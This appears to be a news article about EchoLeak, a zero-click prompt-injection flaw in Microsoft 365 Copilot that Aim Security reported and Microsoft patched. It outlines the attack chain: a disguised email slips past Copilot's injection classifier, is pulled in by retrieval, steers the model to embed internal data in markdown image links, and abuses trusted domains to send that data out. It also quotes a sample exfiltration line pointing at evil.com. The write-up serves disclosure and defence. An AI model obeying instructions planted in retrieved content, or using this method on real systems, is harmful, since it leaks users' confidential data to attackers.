It has recently been reported that a breakthrough cyber threat known as EchoLeak has been documented as the first documented zero-click vulnerability that specifically targets Microsoft 365 Copilot in the enterprise. This raises important concerns regarding the evolving risks associated with AI-based enterprise tools.
In a recent report, cybersecurity firm AIM Security has discovered a vulnerability that allows threat actors to stealthily exfiltrate sensitive information from Microsoft's intelligent assistant without any user interaction, marking a significant improvement in the sophistication of attacks that are based on artificial intelligence.
This vulnerability, known as CVE-2025-32711, which carries a critical CVSS score of 9.3, represents an extremely serious form of injection of commands into the artificial intelligence system.
Copilot's responses can be manipulated by an unauthorised actor, and data disclosure over a network can be forced by indirect prompt injection even when the user has not engaged or clicked on any of the prompts.
As part of the June 2025 Patch Tuesday update, Microsoft confirmed that this issue exists and included the fix in the patch. In the update, Microsoft addressed 68 vulnerabilities in total.
An EchoLeak is a behaviour described as a "scope Violation" in large language models (LLMs). This is the result of the AI’s response logic being bypassed by contextual boundaries that were meant to limit the AI’s behaviour. As a result, unintended behaviours could be displayed and confidential information could be leaked.
In spite of the fact that no active exploitation of the flaw has been detected, Microsoft has stated that there is no need for the customer to take any action at this time, since this issue has already been resolved. In light of this incident, it becomes increasingly apparent that the threat of securing AI-powered productivity tools is growing and that organisations must put in more robust measures to protect data from theft and exploitation.
It is believed that the EchoLeak vulnerability exploits a critical design flaw in Microsoft 365 Copilot's interaction with trusted internal data sources, including emails, Teams conversations, and OneDrive files, as well as untrustworthy external inputs, especially inbound emails, that can be exploited in a malicious manner.
As a result of the attack, the threat actor sends an email that contains the following markdown syntax:
![Image alt text][ref] [ref]: https://www.evil.com?param=
The code seems harmless, but it exploits Copilot's background scanning behaviour in a way that appears harmless. When Copilot processes an email without any user action, it is inadvertently executing a browser request to transmit information to an external server controlled by an attacker, including user details, chat history, and confidential internal documents.
Considering this kind of exfiltration requires no user input, it's particularly stealthy and dangerous. It relies on a triple underlying vulnerability chain to carry out the exploit chain, one of the most critical of which is a redirect loophole within Microsoft's Content Security Policy (CSP). As a result of the CSP's inherent trust in domains such as Microsoft Teams and SharePoint, attackers have been able to disguise malicious payloads as legitimate traffic, enabling them to evade detection.
By presenting the exploit in a clever disguise, it is possible to bypass the existing defences that have been built to protect against Cross-Prompt Injection Attacks (XPIA)—a type of attack that hijacks AI prompts across contexts—to bypass existing defences. EchoLeak is considered to be an example of an LLM Scope Violation, a situation in which large language models (LLMs) are tricked into accessing and exposing information that goes outside of their authorised scope, which constitutes an LLM Scope Violation.
It is reported that the researchers at the company are able to use various segments of the AI's context window as references to gather information that the AI should not reveal. In this case, Copilot can synthesize responses from a variety of sources, but becomes a vector for data exfiltration because the very feature that enables Copilot to do so becomes a vector for data exfiltration.
According to Michael Garg, Co-Founder and CTO of Aim Security, a phased deployment of artificial intelligence does not guarantee safety.
In his opinion, EchoLeak highlights a serious concern with the assumptions surrounding artificial intelligence security, particularly in systems that combine trusted and untrusted sources without establishing strict boundaries.
Interestingly, researchers have also found similar vulnerabilities in other LLM-based systems, suggesting that the issue may go beyond Microsoft 365 Copilot as well.
It is now understood that the flaw has been fixed by Microsoft and that no malicious exploitation has been reported in the wild, and no customer information has been compromised as a result.
However, the discovery of EchoLeak serves to remind us of the unique risks that AI-powered platforms pose and that proactive security validation in AI deployments is an imperative step.
In EchoLeak, a complex yet very simple exploit is exploited, which exploits the seamless integration between large language models (LLMs) and enterprise productivity tools by leveraging the deception-like simplicity of the attack chain and utilising it to its fullest extent. In the beginning, the attack begins with a malicious email designed to appear as a routine business communication.
It does not contain any obvious indicators that would raise suspicions.
This message is disguised as a benign one, but it has been crafted into a stealthy prompt injection, a clever piece of text that is intended to manipulate the AI without being detected. The reason this injection is so dangerous is the natural language phrasing it uses, which enables it to bypass Microsoft's Cross-Prompt Injection Attack (XPIA) classifier protections in order to evade detection.
The message is constructed in such a way that it appears contextually relevant to the end user, so existing filters do not flag the message. Then, whenever a user interacts with Copilot and poses a related business query, the Retrieval-Augmented Generation (RAG) engine from Microsoft retrieves that previously received email and interprets it as relevant to the user's request within the LLM's context input.
The malicious injection, once it is included in the prompt context, disappears from sight and undercoverly instructs the LLM to extract internal data, such as confidential memos or user-specific identifiers, and embed these sensitive details as a URL or image reference on the site.
As a result of exploiting certain markdown image formats during testing, the browser was prompted to fetch the image without prompting the user, which then sent the entire URL, including the embedded sensitive data, to the attacker’s server, without the user being aware of the situation.
Among the key components that enable the exploit is Microsoft Copilot’s Content Security Policy (CSP), which, despite being designed to block external domains, trusts Microsoft-owned platforms such as Teams and SharePoint despite blocking most external domains.
By cleverly concealing their exfiltration vectors, attackers have the ability to avoid CSP protections by making outbound requests appear legitimate, bypassing CSPs and ensuring the outbound request appears legitimate.
While Microsoft has since patched the vulnerability, the EchoLeak incident points to a broader and more alarming trend: as LLMs become increasingly integrated into business environments, traditional security frameworks are becoming increasingly unable to detect and defend against contextual and zero-click artificial intelligence attacks.
It has been found that the increasing complexity and autonomy of artificial intelligence systems have already created a whole new class of vulnerabilities which could be concealed and weaponised to obtain high-impact intrusions through stealth.
It has become increasingly common for security experts to emphasise the need for enhanced prompt injection defences against such emerging threats, including enhanced input scoping, the use of postprocessing filters to block AI-generated outputs containing structured data or external links, as well as smarter configurations in RAG engines that prevent the retrieval of untrusted data.
It is essential to implement these mitigations in AI-powered workflows in order to prevent future incidents of data leakage via LLMs, as well as build resilience within these workflows.
Research from AIM Security has shown that the EchoLeak exploit is very severe and exploits Microsoft's trusted domains, such as SharePoint and Teams, that have been approved by Copilot's Content Security Policy (CSP) for security purposes.
It is possible to embed images and hyperlinks into Microsoft 365 Copilot seamlessly by using these whitelisted domains, which allow external content, such as images, to be seamlessly rendered within the application.
When Copilot processes such content, even in the background, it can initiate outbound HTTP requests, sending sensitive contextual data to servers owned by attackers without being aware of it.
The insidious nature of this attack is that it involves no interaction from the user at all, and it is extremely difficult to detect. Essentially, the entire exploit chain is executed in silence in the background, triggered by Copilot's automated scanning and processing of incoming email content, which can include maliciously formatted documents.
To use this exploit, the user doesn't need to open the message or click on any links. Instead, the AI assistant automatically launches the data exfiltration process with its internal mechanisms, earning the exploit the classification of a "zero-click" attack.
This exploit has been validated by Aim Security through the development and publication of a proof-of-concept, which demonstrates how deeply embedded and confidential information, such as internal communications and corporate strategy documents, could be exploited without causing any visible signs or warnings to the end user or to system administrators, without anyone being aware of it at all.
There is a significant challenge in detecting threats and investigating forensic events due to the stealthy nature of the vulnerability. Microsoft has addressed he vulnerability and has taken swift measures to address it, reminding users that no active exploitation has been observed so far, and no customer data has been compromised as of yet.
Although the broader implications of the current situation remain unsettling, the very architecture that enables AI systems such as Copilot to synthesise data, engage with users, and provide assistance will also become a potential attack surface - one that is both silent and highly effective in its capabilities.
Despite the fact that this particular instance may not have been exploited in the wild, cybersecurity professionals warn that the method itself signals a paradigm shift in the vulnerability landscape when it comes to AI-related services.
With the increasing use of artificial intelligence services such as Microsoft 365 Copilot, the threat landscape has expanded considerably, but it also highlights the importance of context-aware security models as well as AI-specific threat monitoring frameworks in light of the increasing integration of large language models into enterprise workflows.